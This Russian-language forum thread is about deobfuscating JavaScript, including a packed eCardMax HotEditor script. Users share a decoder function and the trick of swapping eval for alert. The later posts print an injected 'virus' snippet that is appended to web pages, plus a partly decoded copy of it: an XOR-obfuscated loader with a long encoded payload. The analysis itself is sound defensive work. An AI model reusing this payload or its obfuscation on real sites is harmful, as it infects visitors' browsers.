Пожалуйста расшифруйте JS-скрипт http://www.voland-lab.com/js.txt Он же eCardMax HotEditor. Если у кого есть, поделитесь.
обьясняю. Он не зашифрован ничем, его ненадо расшифровывать. И вобще я не слышал, чтобы JavaScript шифровали.. он же работать не будет. Просто немножко павтыкай в код, сделав его немного красивее. Возьми шнягу какую-нибудь, которая подсвечивает скобки и прочую гадость. NotePad++ к примеру.
Code: Просто немножко павтыкай в код, сделав его немного красивее. Возьми шнягу какую-нибудь, которая подсвечивает скобки и прочую гадость. NotePad++ к примеру. Если [x26]VOLAND попросил помочь, значит он считает, что пока недостаточно уверенно ориентируется в JS чтобы сделать это самостоятельно. Стоит ли советовать ему "немного повтыкать в код, сделав его красивее"? P.S. Сравни исходный файл (последний кусок обфусцирован) и результат.
Пасип, суть понял, прочитав описание метода eval() Ну не кодер я Пробовал, знаком, кое чего даже могу, но не кодер..увы
http://dump.ru/files/o/o601039227/ пасс тот же Приводится в читаемый вид довольно просто (не сложно догадаться, что я использовал textarea, а там был закрывающий тэг), тем более, что используется всем известный пакер. P.S. иногда бывает полезно переписать стандартные функции, чтобы не заменять в коде каждый их вызов,например так: Code: eval = function(s) { alert(s); } Конечно, это нужно делать до запуска исследуемого скрипта. P.P.S А чтобы было сложно разобраться в коде, не "шифруйте" скрипты за счёт работы со строками и всяких преобразований - это бессмысленно. Используйте прототипирование. Очень полезно. И сразу становится проще самому написать.
dx4r, Code: <script type="text/javascript"> function decodetest(){ //get the input var t = document.getElementById('dectest').value; //remove carriage returns t = t.replace(new RegExp("\\=\r\n","gim"), ""); //replace urlencoded values t = unescape(t); //replacement values var thechrs = new Array( ' ','!','"','#','$','%','&',"'",'(',')','*','+',',','-','.','/','0','1','2','3', '4','5','6','7','8','9',':',';','<','=','>','?','@','A','B','C','D','E','F','G', 'H','I','J','K','L','M','N','O','P','Q','R','S','T','U','V','W','X','Y','Z','[', '\\',']','^','_','`','a','b','c','d','e','f','g','h','i','j','k','l','m','n','o', 'p','q','r','s','t','u','v','w','x','y','z','{','|','}','~',' ','c','u','e','a', 'a','a','a','c','e','e','e','i','i','i','a','a','e','ae','ae','o','o','o','u','u', 'y','u','u','o','l','0','x','f','a','i','o','u','n','n','*','O','?','r','_','?', '?','!','<','>','_','_','_','|','|','a','a','a','c','|','|','+','+','c','y','+', '+','-','-','+','-','+','a','a','+','+','-','-','|','-','+','.','.','d','e','e', 'e','i','i','i','i','+','+','_','_','|','i','_','o','o','o','o','o','o','u','p', 'p','u','u','u','y','y','_',"'",'-','?','_','?','?','S','÷','¸','°','¨','·','¹', '³','²','_',' '); //replace js numeric array values var l = 32; for (l = 32; l < 256; l++){ t = t.replace(new RegExp("\\[" + l + ",","gim"),"[" + thechrs[l-32] + ","); t = t.replace(new RegExp("\\[" + l + ",","gim"),"[" + thechrs[l-32] + ","); } for (l = 32; l < 256; l++){ t = t.replace(new RegExp("," + l + "\\]","gim"),"," + thechrs[l-32] + "]"); t = t.replace(new RegExp("," + l + "\\]","gim"),"," + thechrs[l-32] + "]"); } for (l = 32; l < 256; l++){ t = t.replace(new RegExp("," + l + ",","gim"),"," + thechrs[l-32] + ","); t = t.replace(new RegExp("," + l + ",","gim"),"," + thechrs[l-32] + ","); } ta = t; t = t.replace(new RegExp("(\\[[^\\]]+)\\,([^\\]]+\\])","gim"), "$1$2"); while(ta !== t){ ta = t; t = t.replace(new RegExp("(\\[[^\\]]+)\\,([^\\]]+\\])","gim"), "$1$2"); } //replace entities var l = 32; for (l = 32; l < 100; l++){ t = t.replace(new RegExp("&#" + l + ";","gim"),thechrs[l-32]); t = t.replace(new RegExp("�" + l + ";","gim"),thechrs[l-32]); t = t.replace(new RegExp("�" + l + ";","gim"),thechrs[l-32]); } var l = 100; for (l = 100; l < 256; l++){ t = t.replace(new RegExp("&#" + l + ";","gim"),thechrs[l-32]); t = t.replace(new RegExp("�" + l + ";","gim"),thechrs[l-32]); } //return results document.getElementById("parsed").innerHTML = t; } </script>
А кто вот этот вирусок расшифрует? Прикрепляется в конец файла **** Вот как он выглядит (вырезал середину): HTML: <!-- [ 4455e927ffa4408f4d13cbdc18c9a79d ] --><script>eval('\x66\x75\x6e\x63\x74\x69\x6f\ ... x37\x64\x27\x29\x3b');</script><!-- end --> http://ifolder.ru/7042045 http://rapidshare.com/files/123665937/virus_help_.rar http://depositfiles.com/files/6091668
Замени eval на alert Code: function wFh (gBZfU) { function aVET (uEeYZ) { var wzflAe = 0; var huL = uEeYZ.length; var eEUIOL = 0; while (eEUIOL < huL) { wzflAe += gIsqvl (uEeYZ, eEUIOL) * huL; eEUIOL++; } return (wzflAe + ''); } function gIsqvl (nOI, ierOXSV) { return nOI.charCodeAt (ierOXSV); } try { var jGMOy = eval ('aDrzgouzmoefnDtfso.fcfaDlolzebeo'.replace (/[fzoDb]/g, '')); var whT = new String (); var gDI = 0; yQyUmy = 0, vTkBMe = (new String(jGMOy)).replace(/[^@a-z0-9A-Z_.,-]/g,''); var tDGIej = aVET (vTkBMe); gBZfU = unescape (gBZfU); for (var mGtHBvkh = 0; mGtHBvkh < (gBZfU.length); mGtHBvkh++){ var hFgH = gIsqvl (vTkBMe,gDI) ^ gIsqvl (tDGIej, yQyUmy); var qKpcSA = gIsqvl (gBZfU, mGtHBvkh); yQyUmy++; gDI++; if (yQyUmy > tDGIej.length) yQyUmy = 0; if (gDI > vTkBMe.length) gDI = 0; whT += String.fromCharCode (qKpcSA ^ hFgH); } alert (escape(whT)); //добавлено мной //eval(whT); // закоментировано тоже мной :) return whT = new String(); } catch (e){} } wFh ('%33%33%36%37%36%33%36%32%57%3b%09%79%5c%17%28%58%1a%27%73%20%30%31%2d%32%23%1d%35%02%66%4e%72%14%0e%25%27%34%36%28%3d%3e%22%04%4a%64%5b%61%3d%36%15%20%02%3a%04%34%35%76%28%2f%30%35%7e%20%0d%29%6b%17%0d%1c%09%17%67%19%2f%74%36%3d%30%17%17%12%20%11%75%2b%14%32%3d%6b%7e%33%33%20%0a%36%29%65%78%2f%31%22%1a%4e%30%74%4c%4c%54%68%54%73%6b%1f%3f%1e%43%46%72%5f%66%74%63%3f%3d%78%21%16%3d%7f%4a%6f%70%61%2d%3f%10%3f%3a%31%3e%1a%24%60%6d%4c%62%5c%0b%73%36%25%6a%1a%3d%14%37%25%3c%26%15%30%2e%07%12%1d%30%7d%7e%68%64%56%48%7e%76%5c%63%3b%3a%2c%53%2a%05%15%2e%24%2c%20%77%68%45%2f%20%18%63%29%75%7a%67%4f%5a%1c%63%7c%7e%68%6b%76%41%24%30%28%1f%23%36%20%7d%06%7a%0c%7e%7d%5d%73%7e%70%5d%7f%71%73%73%38%63%7d%60%4c%79%70%27%39%25%2f%5c%37%02%6b%17%36%2b%25%08%16%2e%0c%2a%07%6a%6c%7f%76%71%66%4f%63%74%59%5e%72%22%0e%38%7b%36%25%75%6f%60%4c%7d%04%25%3f%2e%7d%30%04%33%2c%60%13%78%3e%14%0e%2b%2b%76%24%36%37%2d%3e%3a%34%53%6d%3f%1c%76%70%6c%02%72%06%07%34%05%65%22%7b%33%77%2d%7f%47%71%56%35%61%71%50%06%53%1d%66%01%42%0b%66%08%44%35%62%7d%71%04%6b%34%6c%0b%27%0e%05%01%0a%09%06%75%39%6c%22%44%66%70%03%26%0e%1d%21%3a%0d%2b%71%2a%1a%38%01%1c%71%4d%09%5e%0b%7d%43%3a%7d%7e%42%3b%7a%79%7d%4a%21%11%02%5e%2e%3a%32%76%2d%66%40%6e%21%68%16%7e%2f%6b%74%69%09%40%4c%1d%7d%68%24%15%0c%21%3b%68%0f%21%2f%2a%59%17%17%0a%36%6d%67%2b%2e%12%33%65%04%33%2f%23%13%2b%78%4c%59%04%54%2c%22%2f%3d%20%1c%41%4a%57%33%6a%59%79%09%11%30%1e%29%24%47%21%58%23%63%34%28%08%3f%31%2a%1e%03%0d%2c%0d%26%1b%1d%1b%37%79%22%7e%03%28%3a%21%2b%26%0d%21%4f%44%31%71%3a%25%24%05%11%64%75%70%15%14%31%6d%32%36%32%13%69%38%3e%1c%14%6a%24%74%3d%0e%23%21%26%17%32%30%20%1a%35%2d%5b%3c%38%2e%1e%34%01%18%23%10%22%75%4b%57%7d%7b%73%5b%78%61%23%37%28%29%7a%22%39%2d%29%2d%38%17%3b%38%28%33%68%44%7f%7c%7f%71%56%79%69%3f%78%36%39%45%20%4f%7a%31%03%26%6c%3c%23%47%41%7a%58%0f%10%0d%29%64%72%11%22%2a%35%38%34%00%5b%49%2e%2a%7f%33%11%01%67%26%18%55%32%73%57%75%21%6c%7b%29%06%35%0b%22%1e%3f%4a%56%3c%0a%23%33%32%37%37%2a%39%68%4c%0d%0f%19%50%5b%77%29%33%1a%71%37%3f%00%06%1b%1d%07%21%28%0c%35%2c%3c%33%12%33%4f%53%69%3c%37%3b%34%53%24%64%4b%23%0b%16%0b%13%5d%08%00%66%5c%20%1a%17%59%00%16%1e%3e%22%1b%78%17%18%6b%0c%08%51%3f%73%31%30%20%2a%37%37%3c%3c%06%0b%7d%66%34%34%20%5e%71%7c%37%67%20%49%09%68%19%6a%0d%2b%1c%3b%7b%0f%6a%7c%74%33%0e%21%53%79%0e%16%56%35%07%31%0b%41%06%3d%71%2f%63%61%33%32%31%30%14%2e%19%62%7c%1a%3f%07%18%2a%56%6a%09%76%25%60%7e%7e%70%4f%76%03%2a%38%36%72%7f%31%17%13%20%13%36%3c%0a%1e%1b%4a%7f%77%3a%19%74%07%64%64%5f%78%7a%18%31%5c%37%05%6c%32%33%05%2c%60%07%19%6d%6b%6f%03%6e%71%3d%66%2c%68%36%49%49%2e%24%60%15%2f%13%33%18%60%7a%68%4c%06%25%27%79%2a%0a%7b%52%1e%6b%3d%74%75%4d%53%57%42%3a%6a%38%73%39%1a%33%22%73%18%6a%7a%23%61%58%67%17%75%19%52%72%34%70%17%7a%2b%7f%6c%79%18%5f%0c%17%30%26%05%5a%11%6c%59%36%6c%1d%3a%3e%06%09%7d%4a%7c%13%35%21%21%35%2e%7e%34%59%21%31%09%33%2d%29%20%39%34%43%03%35%17%01%25%70%79%3e%04%1c%69%0a%1c%2d%26%32%7b%7c%2a%69%20%7b%74%39%1b%31%0a%22%1d%4f%6d%59%5f%32%3c%18%29%33%27%3a%58%7b%25%2b%15%6e%01%27%32%1d%48%3a%5c%6d%71%38%78%58%0c%7f%58%7d%01%6a%7c%20%05%1e%0a%37%13%55%14%5c%11%5e%78%65%63%3b%39%36%26%2b%0a%09%51%6f%0b%54%6c%37%3f%20%18%08%33%02%04%71%2f%09%0f%28%1b%2b%79%24%4d%2d%4f%7a%68%73%5b%52%14%21%22%0e%3d%4d%2d%2a%32%07%1b%15%38%34%7d%77%27%34%0e%34%75%2c%09%20%0d%32%2e%7e%3b%38%34%5f%5f%31%0a%30%31%50%35%77%34%38%34%34%10%09%38%02%1a%2e%7a%26%1f%4d%07%24%2e%1b%3f%77%3e%2d%38%4d%4a%7b%31%30%1b%3f%26%3e%1e%16%6b%3b%05%1a%3e%5c%75%3e%37%29%22%3e%68%20%14%21%17%67%22%79%79%2f%3e%15%7c%21%25%14%27%6d%76%66%71%35%4f%34%35%2a%06%5f%38%26%74%0d%22%2d%79%1d%20%01%3b%7d%6b%47%32%06%25%17%34%38%23%41%75%7d%7c%41%4b%51%77%47%55%5a%59%70%7f%7f%64%28%3b%0f%07%3b%63%2f%23%6f%3d%28%23%2d%1f%36%4e%51%3d%34%36%03%31%67%75%61%75%7c%71%57%7e%5a%19%09%64%20%2b%3a%76%13%37%1a%16%1b%50%54%7c%7c%6c%21%31%20%32%05%33%22%46%51%69%21%74%36%1c%11%22%3c%7f%22%04%0a%10%1e%57%77%7c%6c%2b%5a%00%11%16%14%2d%32%3a%27%2c%3d%7a%6b%36%3c%17%04%30%2e%3f%36%65%76%3a%33%08%11%29%22%17%3b%31%0c%1e%16%6b%7a%34%19%1a%08%5a%67%4a%25%2f%3e%31%37%0f%0b%32%00%35%7d%63%09%62%21%32%01%54%35%35%2c%17%53%0e%05%31%52%04%17%7f%6c%67%1b%18%15%16%78%2c%39%28%23%16%28%24%4f%75%7d');</script>
Такой вопрос... h_ttp://www.bananascript.com/index.php?compress ведь его тоже можно для "шифровки" использовать?
